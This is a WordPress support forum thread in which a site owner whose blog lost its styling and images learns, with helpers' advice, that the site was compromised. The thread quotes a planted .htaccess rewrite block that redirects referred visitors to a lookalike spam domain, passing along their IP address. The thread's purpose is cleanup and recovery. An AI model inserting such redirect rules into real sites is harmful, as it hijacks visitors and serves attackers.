WordPress.org

Support

Support » How-To and Troubleshooting » WordPress blog appearing as HTML only

WordPress blog appearing as HTML only

  • For some reason, my WordPress blog started appearing only as HTML, with no images. The admin pages are in the proper style, but they also have no images. I have tried upgrading the entire installation, but to no effect. Any suggestions?

Viewing 15 replies - 1 through 15 (of 18 total)
  • Could you give a link?

    Its the stylesheet

    http://www.johnmorrish.com/wordpress/wp-content/themes/default/style.css

    If you go there you can see it redirects you to some spam website, you need to open up the stylesheet and make sure there is nothing in there that isnt support to be, I would also check your .htaccess file to make sure there are no redirects on the stylesheet url.

    Also, open up header & footer php files and check for anything in their that is redirecting traffic.

    I’ve had a look at it but I can’t see that redirect in the stylesheet. What should I be looking for? The .htaccess file at the top of wp-content says this:
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . http://g-oogl-e.com/%{REMOTE_ADDR}

    That doesn’t look right to me. Do I even need a .htaccess file?

    the g-oogl-e.com link is what i was seeing 🙂

    Delete the htaccess file all together – Go through the wp-admin > general settings and it will create a new one for you.

    Hurray, it’s fixed. Thank you very much for your help.

    Oh no, I tell a lie. It still can’t find any images.

    Image URLs are doing the same thing, check the .htaccess file again, i’d also check your functions.php file for anything in there.

    There are similarly dodgy .htaccess files in uploads and image folders. But when I try to delete them I get a message saying “server file error; operation not permitted”. How do I get round that?

    If you are on a cPanel web host, try going in via cPanel > File Manager and doing it like that, most control panels have these things so don’t worry if you don’t have cPanel.

    You want to be deleting all these .htaccess files though.

    Alternatively email your web host and ask them to go in and delete them for you if your still unable to do it.

    No, I’m not on a cPanel host. Is there no way of doing it by ftp?

    If clicking delete on it doesn’t work then check the permissions on it, make them read/write and then try delete.

    permissions on both folders and files are 755, which should let me as owner delete them, shouldn’t it?

    Having the exact same thing happen to me. html files for all my page appear, wordpress files are slowly deleted.

    I’ve gone back changed the password usernames for wordpress and my ftp just incase it’s hacked.

    esmi

    @esmi

    Forum Moderator

    Please post a new topic.

Viewing 15 replies - 1 through 15 (of 18 total)
  • The topic ‘WordPress blog appearing as HTML only’ is closed to new replies.